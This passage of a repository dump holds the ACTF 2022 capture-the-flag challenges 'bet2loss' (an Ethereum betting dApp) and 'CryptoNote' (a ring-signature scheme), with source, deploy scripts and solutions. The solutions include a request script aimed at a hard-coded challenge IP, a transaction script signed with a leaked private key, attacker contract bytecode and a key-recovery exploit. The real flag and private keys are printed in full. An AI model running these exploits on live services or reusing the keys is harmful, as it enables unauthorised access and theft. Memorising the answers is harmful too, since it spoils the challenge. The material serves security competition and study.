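  const files = fs.readdirSync(datadir);
  console.log("log files:", files);

  if (files.indexOf(filename) !== -1) {
    res.download(filepath);
  }
  else {
    // res.send(body, extra) would be read by Express 4 as (status, body);
    // set the status explicitly and do not echo the input back.
    res.status(404).send("invalid address");
  }
});

module.exports = router;

--------------------------------------------------------------------------------
/blockchain/bet2loss/attachments/routes/sync.js:
--------------------------------------------------------------------------------
var express = require('express');
var router = express.Router();
let fs = require("fs");
const path = require('path');

/**
 * POST / (sync route) - append the posted record to the log file of one
 * address.
 *
 * Expects `req.body.address` to be a "0x"-prefixed hex string; the whole
 * request body is serialised with JSON.stringify and appended to
 * /app/data/<normalised address>.txt.
 *
 * Responses: "OK" after the append, "FAIL" when the append reports an error,
 * 400 "invalid address" for a missing or malformed address.
 */
router.post('/', function (req, res, next) {
  console.log("sync", req.body);

  // address check: a non-string value (or a missing body) is rejected here
  // instead of throwing on startsWith().
  const requested = req.body ? req.body.address : undefined;
  if (typeof requested !== 'string' || !requested.startsWith('0x') || !Number.isFinite(parseInt(requested, 16))) {
    res.status(400).send("invalid address");
    return;
  }

  // Only the normalised hex form is used in the file name, so no other
  // character of the request value can reach the path.
  // NOTE(review): parseInt() returns a double, so a 160-bit address keeps only
  // its leading ~53 bits; distinct addresses can share one file.
  const address = "0x" + parseInt(requested, 16).toString(16);
  const filename = address + ".txt";

  // put this record into file
  const filedata = JSON.stringify(req.body);

  const datadir = "/app/data";
  const filepath = path.join(datadir, filename);

  fs.appendFile(filepath, filedata, function (err) {
    if (err) {
      res.send("FAIL");
      // Stop here: answering "OK" as well would attempt a second response
      // on the same request.
      return;
    }
    res.send("OK");
  });
});

module.exports = router;

--------------------------------------------------------------------------------
/blockchain/bet2loss/attachments/start.sh:
--------------------------------------------------------------------------------
#!/bin/sh
/usr/local/bin/node /app/bin/www
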
-------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/views/error.jade: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | h1= message 5 | h2= error.status 6 | pre #{error.stack} 7 | -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/views/index.jade: -------------------------------------------------------------------------------- 1 | extends layout 2 | 3 | block content 4 | h1= title 5 | div 6 | p Welcome to #{title} dApp 7 | p The Provider URL is #{provider} 8 | p Game Contract: 9 | p#gameContract #{contract} 10 | 11 | div 12 | button#connectButton 13 | 14 | div 15 | p current status: 16 | div 17 | span.label active account: 18 | p#activeAddress 19 | div 20 | span.label balance: 21 | p#remainBalance 22 | div 23 | span.label chance: 24 | p#remainChance 25 | div 26 | button#refreshBtn 27 | 28 | div 29 | button#getAirdrop 30 | 31 | div 32 | div 33 | p bet value 34 | input#inputBetVal(type="text") 35 | div 36 | p bet mod 37 | input#inputBetMod(type="text") 38 | div 39 | button#startBet 40 | 41 | div 42 | p#downloadData 43 | button#downloadContent 44 | 45 | div 46 | p#flagData 47 | button#getFlag 48 | 49 | script(src='/javascripts/index.js') -------------------------------------------------------------------------------- /blockchain/bet2loss/attachments/views/layout.jade: -------------------------------------------------------------------------------- 1 | doctype html 2 | html 3 | head 4 | title= title 5 | link(rel='stylesheet', href='/stylesheets/style.css') 6 | body 7 | block content 8 | -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/README.md: -------------------------------------------------------------------------------- 1 | ## solution1(intended) 2 | 3 | One bug in the code to view logs. 
Use it to get sealer's private key and seal token to yourself. 4 | 5 | ## soluton2(intended-after-verification) 6 | 7 | pre-calculate the answer in the constructor function and call bet is OK for win once for one address. 8 | 9 | call constructor by `CREATE2` to depoly the contract and the call `selfdestruct` to suicide for multi times is OK for win enough for one address. 10 | 11 | the BetToken in this directory is a older version, about it's abi is OK. 12 | 13 | ## solution3(unintended) 14 | 15 | tkmk found the output speed of blocks is constant, so block.timestamp is predictable. -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution1/post.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | url = 'http://123.60.36.208:30000/log' 4 | 5 | r = requests.post(url, json = {'address': 'password'}) 6 | 7 | print(r.text) 8 | -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution1/solve.py: -------------------------------------------------------------------------------- 1 | from web3 import Web3 2 | 3 | w3 = Web3(Web3.HTTPProvider('http://10.12.77.33:8545')) 4 | 5 | privkey = "143dbfce3df2e5fd33e410a138a8b175802effd56731375afa6d56c6e31ff80d" 6 | sealer = Web3.toChecksumAddress("0x20881fc6f0c9ebca911c9c07a54e60e7bd6ef4cc") 7 | contract = Web3.toChecksumAddress("0xE54709e02C58a610a29e8723b1bdeC31bfd4c6b5") 8 | gamer = Web3.toChecksumAddress("0xE530c26D50aD7c4cE8E958E7626566d3F528FAA6") 9 | 10 | def get_txn(src, dst, data, value=0): 11 | return { 12 | "chainId": 6666, 13 | "from": src, 14 | "to": dst, 15 | "gasPrice": w3.toWei(1.1, 'gwei'), 16 | "gas": 0x20000, 17 | "value": w3.toWei(value, 'wei'), 18 | "nonce": w3.eth.getTransactionCount(src), 19 | "data": data 20 | } 21 | 22 | data = "0xe7a33822" + gamer[2:].rjust(64, '0') + hex(2001)[2:].rjust(64, '0') 23 | tx = get_txn(sealer, 
contract, data) 24 | txn_hash = w3.eth.sendRawTransaction(w3.eth.account.signTransaction(tx, privkey).rawTransaction).hex() 25 | txn_receipt = w3.eth.waitForTransactionReceipt(txn_hash) 26 | print(txn_receipt) -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Attacker.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[{"internalType":"address","name":"addr","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"doAirDrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"doNextTick","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"nonce","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pick","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"nn","type":"uint256"}],"name":"setNonce","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"state","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Callee.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[{"internalType":"contract BetToken","name":"bt","type":"address"},{"internalType":"contract HasState","name":"state","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"die","outputs":[],"stateMutability":"nonpayable","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Callee.bin: 
-------------------------------------------------------------------------------- 1 | 608060405234801561001057600080fd5b5060405161038538038061038583398101604081905261002f91610297565b806001600160a01b031663c19d93fb6040518163ffffffff1660e01b8152600401602060405180830381865afa15801561006d573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061009191906102d1565b6000036100f057816001600160a01b0316633884d6356040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156100d357600080fd5b505af11580156100e7573d6000803e3d6000fd5b50505050610278565b806001600160a01b031663c19d93fb6040518163ffffffff1660e01b8152600401602060405180830381865afa15801561012e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061015291906102d1565b600103610278576000600c826001600160a01b031663affed0e06040518163ffffffff1660e01b8152600401602060405180830381865afa15801561019b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906101bf91906102d1565b60408051602081019290925242908201524460608083019190915230901b6001600160601b03191660808201526094016040516020818303038152906040528051906020012060001c61021291906102ea565b604051636ffcc71960e01b815260048101829052600c60248201529091506001600160a01b03841690636ffcc71990604401600060405180830381600087803b15801561025e57600080fd5b505af1158015610272573d6000803e3d6000fd5b50505050505b505061030c565b6001600160a01b038116811461029457600080fd5b50565b600080604083850312156102aa57600080fd5b82516102b58161027f565b60208401519092506102c68161027f565b809150509250929050565b6000602082840312156102e357600080fd5b5051919050565b60008261030757634e487b7160e01b600052601260045260246000fd5b500690565b606b8061031a6000396000f3fe6080604052348015600f57600080fd5b506004361060285760003560e01c806335f4699414602d575b600080fd5b60336000ff5b00fea2646970667358221220bde5421236a79993e62dccea676f2030e77aad4e9a37b60927ffb9165298b6be64736f6c634300080f0033 -------------------------------------------------------------------------------- 
/blockchain/bet2loss/exploits/solution2/build/Context.abi: -------------------------------------------------------------------------------- 1 | [] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Context.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/bet2loss/exploits/solution2/build/Context.bin -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/HasState.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[],"name":"nonce","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"state","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/HasState.bin: -------------------------------------------------------------------------------- 1 | 6080604052348015600f57600080fd5b50608f8061001e6000396000f3fe6080604052348015600f57600080fd5b506004361060325760003560e01c8063affed0e0146037578063c19d93fb146051575b600080fd5b603f60015481565b60405190815260200160405180910390f35b603f6000548156fea2646970667358221220572104ad43db22b47c71b30a517e48207ff3d9c3de51536f11ab8f0fb7bf2d5064736f6c634300080f0033 -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Ownable.abi: -------------------------------------------------------------------------------- 1 | 
[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Ownable.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/bet2loss/exploits/solution2/build/Ownable.bin -------------------------------------------------------------------------------- /crypto/CryptoNote/attachments/crypto_note.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/CryptoNote/attachments/crypto_note.tar.gz -------------------------------------------------------------------------------- /crypto/CryptoNote/attachments/hint1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/CryptoNote/attachments/hint1.tar.gz -------------------------------------------------------------------------------- /crypto/CryptoNote/attachments/hint2.py: -------------------------------------------------------------------------------- 1 | import secret, hashlib 2 | assert hashlib.sha256((hex(secret.bob_pub[0]) + 
hex(secret.bob_pub[1])).encode()).hexdigest() == "3a66fb0241a28b7439ed71b0a202bd8a904afb8175c1a3247f6335814ccb4969" 3 | assert hashlib.sha256((hex(secret.carol_pub[0]) + hex(secret.carol_pub[1])).encode()).hexdigest() == "eca9746a961fdb403df08880668ebd5322883addb84d3d9d385d54fcfd337dea" -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | # docker build -t aaa_crypto_note:latest . 2 | # docker run -p 8080:8080 aaa_crypto_note:latest 3 | FROM sagemath/sagemath:9.5 4 | 5 | WORKDIR /home/sage 6 | 7 | COPY src/* . 8 | RUN chmod +x ./deploy.sh; sudo ./deploy.sh 9 | 10 | EXPOSE 8080 11 | CMD ["sudo", "./run_socat.sh"] 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/deploy.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | pip3 config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple 4 | pip3 install pycryptodome 5 | 6 | echo deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ impish main restricted universe multiverse > /etc/apt/sources.list 7 | 8 | apt update 9 | apt install -y socat 10 | 11 | chmod +x /home/sage/run_socat.sh /home/sage/run_instance.sh 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/run_instance.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | python3 blockchain_service.py 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/run_socat.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | socat tcp-listen:8080,fork 
exec:./run_instance.sh,reuseaddr 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/secret.py: -------------------------------------------------------------------------------- 1 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 2 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 3 | 4 | bob_priv = 0x53b107debf18b3ea554aa73cd6fa5a1fbb65ce6123e000c02ec3d7bb7886c9a6 5 | bob_pub = (0x4456dc89ea7627b2d8dfab635b4e81082718954f1b2634edd94bf4a6287b969, 0x60154f38f9def126611823e205ae3b5e68ffe5a5de6ec48c206738712ad78a1e) 6 | 7 | carol_priv = 0x25b78f8b4f459fcb635e8707115ed8fa9869e0663befdc1232110001b1c9f77 8 | carol_pub = (0x231c0ea18fd6bd4225012d8f7d77e060787f3e6bdc1e0ae3128abe812746632c, 0x5c7b22d3c1c84b1503a67672db29fc149b18c4b26f6387fa1bb95cb50997f1f7) 9 | 10 | flag = "ACTF{C2yPt_N0t3_aNd_EC_1s_F0n_b5R792Fr79Q94iYH9dQybhlQdKG+S8d9fF8QWzA}" 11 | -------------------------------------------------------------------------------- /crypto/CryptoNote/exploits/carol_public_key_restore.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, deserialize4json, Hp, proof_H, H as Hb, transaction_curve 2 | from sage.all import * 3 | 4 | E, G = proof_curve() 5 | H = proof_H(E) 6 | 7 | assert E.order() == E.base_field().order() - 1 8 | A = sqrt(E.order()) 9 | assert isinstance(A, Integer) 10 | 11 | rp = RangeProof(OTRS(E, G), H) 12 | 13 | with open("range_proof_from_carol.json", "r") as f: 14 | json = f.read() 15 | 16 | C, proof = deserialize4json(E, json) 17 | 18 | def e(P, Q): 19 | return P.weil_pairing(Q, A) 20 | 21 | def otrs_restore(Ks:list, m:bytes, signature:tuple): 22 | # two ways to restore, co-DDH or SMT 23 | ddh_idx = None 24 | smt_idx = None 25 | I, c_0, r = signature 26 | for i, K in 
enumerate(Ks): 27 | Q = Hp(E, G, K) 28 | if e(Q, I) == 1: # SMT way 29 | assert smt_idx == None 30 | smt_idx = i 31 | if e(G, I) == e(K, Q): # co-DDH way 32 | assert ddh_idx == None 33 | ddh_idx = i 34 | assert ddh_idx == smt_idx 35 | return smt_idx 36 | 37 | hash_C = Hb(C) 38 | Cs, sigs = proof 39 | bits = [otrs_restore([C, C - 2**i * H], hash_C, sig) for i, (C, sig) in enumerate(zip(Cs, sigs))] 40 | 41 | tE, tG = transaction_curve() 42 | Px = Integer(int(''.join(['0' if x == 0 else '1' for x in bits[::-1]]), 2)) 43 | possible_carol_pub = tE.lift_x(Px, all=True) 44 | 45 | # from secret import carol_priv, carol_pub 46 | # carol_pub = tE(*carol_pub) 47 | # assert carol_priv * tG == carol_pub 48 | # print('found at', possible_carol_pub.index(carol_pub)) 49 | -------------------------------------------------------------------------------- /crypto/CryptoNote/exploits/secret.py: -------------------------------------------------------------------------------- 1 | # This is a sample file for secret.py. 2 | 3 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 4 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 5 | 6 | # Every secret number in the real secret.py is replaced with 0xAAA...A. 7 | # Every secret string in the real secret.py is replaced with "ACTF{test_flag}". 
8 | 9 | bob_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | bob_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 11 | 12 | carol_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | carol_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 14 | 15 | flag = "ACTF{test_flag}" 16 | -------------------------------------------------------------------------------- /crypto/CryptoNote/exploits/signed_message_from_bob.json: -------------------------------------------------------------------------------- 1 | ["Bob: Do you remember the 1 token I lent you? Pay off that loan, now!", "0a0e7495d51cbd5ea045d1cbca47512ef25d5c6207b25f9d67ac0ccc160390020a50d6f4b88e86192a664d3220b84e53c9166d2c993ee1b6d2edbbdfef5461e5"] -------------------------------------------------------------------------------- /crypto/CryptoNote/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # docker build -t aaa_crypto_note:latest . 2 | # docker run -p 8080:8080 aaa_crypto_note:latest 3 | FROM sagemath/sagemath:9.5 4 | 5 | WORKDIR /home/sage 6 | 7 | COPY src/* . 8 | RUN chmod +x ./deploy.sh; sudo ./deploy.sh 9 | 10 | EXPOSE 8080 11 | CMD ["sudo", "./run_socat.sh"] 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/bob_signed_generate.py: -------------------------------------------------------------------------------- 1 | from json import dump 2 | from signed_message_verifier import SM2, get_bob_sign_pub 3 | from secret import bob_priv 4 | 5 | text = 'Bob: Do you remember the 1 token I lent you? Pay off that loan, now!' 
6 | signer = SM2(public_key=get_bob_sign_pub(), private_key=hex(bob_priv)[2:].zfill(64)) 7 | sign = signer.sign_with_sm3(text.encode()) 8 | 9 | dump([text, sign], open('signed_message_from_bob.json', 'w')) 10 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/build_attachment.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm -rf ../attachment 4 | mkdir ../attachment 5 | 6 | mkdir crypto_note 7 | cp blockchain_service.py crypto_note/ 8 | cp ring_signature.py crypto_note/ 9 | cp signed_message_verifier.py crypto_note/ 10 | cp signed_message_from_bob.json crypto_note/ 11 | cp range_proof_from_carol.json crypto_note/ 12 | cp range_proof_verifier.py crypto_note/ 13 | cp secret_demo.py crypto_note/secret.py 14 | tar czvf crypto_note.tar.gz crypto_note/ 15 | rm -rf crypto_note 16 | 17 | mv crypto_note.tar.gz ../attachment 18 | 19 | mkdir hint1 20 | cp bob_signed_generate.py hint1/ 21 | cp carol_range_proof_generate.py hint1/ 22 | tar czvf hint1.tar.gz hint1/ 23 | rm -rf hint1 24 | 25 | mv hint1.tar.gz ../attachment 26 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/calc_edo_curve.sage: -------------------------------------------------------------------------------- 1 | """ 2 | generate embed degree one curve 3 | """ 4 | 5 | from sage.all import * 6 | 7 | """ 8 | while True: 9 | print("epoch") 10 | n = random_prime(2**375) 11 | A = 2 * n 12 | p = A^2 + 1 13 | if is_prime(p): 14 | break 15 | print(f'{n = :#x}') 16 | print(f'{A = :#x}') 17 | print(f'{p = :#x}') 18 | """ 19 | 20 | n = 0x6c0edfb182b3b5ce4d8cf2db057c675f0ca6c5631e6accf20cc6f3a987eeecc79b285eb1ef132bf71e24c68aa4ca39 21 | A = 0xd81dbf6305676b9c9b19e5b60af8cebe194d8ac63cd599e4198de7530fddd98f3650bd63de2657ee3c498d15499472 22 | p = 
0xb672366c04a2a76427e4f60dbbdfc3b0632d34a5819a44ddf3f01223763741a3126addbae4424bc0e8d6c78a4c083e3c995665a68c58c0f841ccacdf4f0a6fa46f1df43d935b784cf75113327e25c7304becd4a54be1f8ebb114b31802c5 23 | 24 | FF = GF(p) 25 | assert A % 4 == 0 or A % 4 == 2 26 | a = (p - 1) if A % 4 == 0 else (p - 4) 27 | E = EllipticCurve(FF, [a, 0]) 28 | assert E.order() == p - 1 29 | 30 | P = E.random_point() 31 | Q = E.random_point() 32 | 33 | assert P.weil_pairing(2 * P, A) == 1 34 | 35 | pq = P.weil_pairing(Q, A) 36 | assert pq != 1 37 | xpq = (3 * P).weil_pairing(4 * Q, A) 38 | assert pq^12 == xpq 39 | 40 | pq = P.tate_pairing(Q, A, 1) 41 | assert pq != 1 42 | xpq = (3 * P).tate_pairing(4 * Q, A, 1) 43 | assert pq^12 == xpq 44 | 45 | print('Tate e(P, Q) =', P.tate_pairing(Q, A, 1)) 46 | 47 | print(f'curve_gen({p}, [{a}, {3 * p}], {P.xy()[0]}, {P.xy()[1]}, {E.order()})') 48 | print(f'E({Q.xy()[0]}, {Q.xy()[1]})') 49 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/carol_public_key_restore.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, deserialize4json, Hp, proof_H, H as Hb, transaction_curve 2 | from sage.all import * 3 | 4 | E, G = proof_curve() 5 | H = proof_H(E) 6 | 7 | assert E.order() == E.base_field().order() - 1 8 | A = sqrt(E.order()) 9 | assert isinstance(A, Integer) 10 | 11 | rp = RangeProof(OTRS(E, G), H) 12 | 13 | with open("range_proof_from_carol.json", "r") as f: 14 | json = f.read() 15 | 16 | C, proof = deserialize4json(E, json) 17 | 18 | def e(P, Q): 19 | return P.weil_pairing(Q, A) 20 | 21 | def otrs_restore(Ks:list, m:bytes, signature:tuple): 22 | # two ways to restore, co-DDH or SMT 23 | ddh_idx = None 24 | smt_idx = None 25 | I, c_0, r = signature 26 | for i, K in enumerate(Ks): 27 | Q = Hp(E, G, K) 28 | if e(Q, I) == 1: # SMT way 29 | assert smt_idx == None 30 | smt_idx = i 31 | if e(G, I) == e(K, Q): # co-DDH 
way 32 | assert ddh_idx == None 33 | ddh_idx = i 34 | assert ddh_idx == smt_idx 35 | return smt_idx 36 | 37 | hash_C = Hb(C) 38 | Cs, sigs = proof 39 | bits = [otrs_restore([C, C - 2**i * H], hash_C, sig) for i, (C, sig) in enumerate(zip(Cs, sigs))] 40 | 41 | tE, tG = transaction_curve() 42 | Px = Integer(int(''.join(['0' if x == 0 else '1' for x in bits[::-1]]), 2)) 43 | possible_carol_pub = tE.lift_x(Px, all=True) 44 | 45 | # from secret import carol_priv, carol_pub 46 | # carol_pub = tE(*carol_pub) 47 | # assert carol_priv * tG == carol_pub 48 | # print('found at', possible_carol_pub.index(carol_pub)) 49 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/carol_range_proof_generate.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, serialize2json, proof_H 2 | 3 | E, G = proof_curve() 4 | H = proof_H(E) 5 | 6 | rp = RangeProof(OTRS(E, G), H) 7 | Ct = rp.generate_commitment(__import__('secret').carol_pub[0]) 8 | x, r, C = Ct 9 | proof = rp.prove(Ct, 256) 10 | assert rp.verify(C, 256, proof) 11 | with open("range_proof_from_carol.json", "w") as f: 12 | f.write(serialize2json(C, proof)) 13 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/copy_deploy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm -rf ../deploy 4 | mkdir ../deploy 5 | mkdir ../deploy/src 6 | 7 | cp Dockerfile ../deploy 8 | cp blockchain_service.py ../deploy/src 9 | cp ring_signature.py ../deploy/src 10 | cp secret.py ../deploy/src 11 | cp deploy.sh ../deploy/src 12 | cp run_instance.sh ../deploy/src 13 | cp run_socat.sh ../deploy/src 14 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/copy_solution.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm -rf ../solution 4 | mkdir ../solution 5 | 6 | cp blockchain_service.py ../solution 7 | cp ring_signature.py ../solution 8 | cp bob_public_key_restore.py ../solution 9 | cp carol_public_key_restore.py ../solution 10 | cp signed_message_verifier.py ../solution 11 | cp solution.py ../solution 12 | cp signed_message_from_bob.json ../solution 13 | cp range_proof_from_carol.json ../solution 14 | cp secret_demo.py ../solution/secret.py 15 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/deploy.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | pip3 config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple 4 | pip3 install pycryptodome 5 | 6 | echo deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ impish main restricted universe multiverse > /etc/apt/sources.list 7 | 8 | apt update 9 | apt install -y socat 10 | 11 | chmod +x /home/sage/run_socat.sh /home/sage/run_instance.sh 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/range_proof_verifier.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, deserialize4json, proof_H 2 | 3 | E, G = proof_curve() 4 | H = proof_H(E) 5 | 6 | rp = RangeProof(OTRS(E, G), H) 7 | 8 | with open("range_proof_from_carol.json", "r") as f: 9 | json = f.read() 10 | 11 | C, proof = deserialize4json(E, json) 12 | print("verfied" if rp.verify(C, 256, proof) else "FAKE PROOF!") 13 | 14 | # Note: C is a Pedersen commitment for the x-coordinate of Carol's Public key. 15 | # It generated by `rp.generate_commitment(__import__('secret').carol_pub[0])`. 
16 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/run_instance.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | python3 blockchain_service.py 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/run_socat.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | socat tcp-listen:8080,fork exec:./run_instance.sh,reuseaddr 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/secret.py: -------------------------------------------------------------------------------- 1 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 2 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 3 | 4 | bob_priv = 0x53b107debf18b3ea554aa73cd6fa5a1fbb65ce6123e000c02ec3d7bb7886c9a6 5 | bob_pub = (0x4456dc89ea7627b2d8dfab635b4e81082718954f1b2634edd94bf4a6287b969, 0x60154f38f9def126611823e205ae3b5e68ffe5a5de6ec48c206738712ad78a1e) 6 | 7 | carol_priv = 0x25b78f8b4f459fcb635e8707115ed8fa9869e0663befdc1232110001b1c9f77 8 | carol_pub = (0x231c0ea18fd6bd4225012d8f7d77e060787f3e6bdc1e0ae3128abe812746632c, 0x5c7b22d3c1c84b1503a67672db29fc149b18c4b26f6387fa1bb95cb50997f1f7) 9 | 10 | flag = "ACTF{C2yPt_N0t3_aNd_EC_1s_F0n_b5R792Fr79Q94iYH9dQybhlQdKG+S8d9fF8QWzA}" 11 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/secret_demo.py: -------------------------------------------------------------------------------- 1 | # This is a sample file for secret.py. 
2 | 3 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 4 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 5 | 6 | # Every secret number in the real secret.py is replaced with 0xAAA...A. 7 | # Every secret string in the real secret.py is replaced with "ACTF{test_flag}". 8 | 9 | bob_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | bob_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 11 | 12 | carol_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | carol_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 14 | 15 | flag = "ACTF{test_flag}" 16 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/signed_message_from_bob.json: -------------------------------------------------------------------------------- 1 | ["Bob: Do you 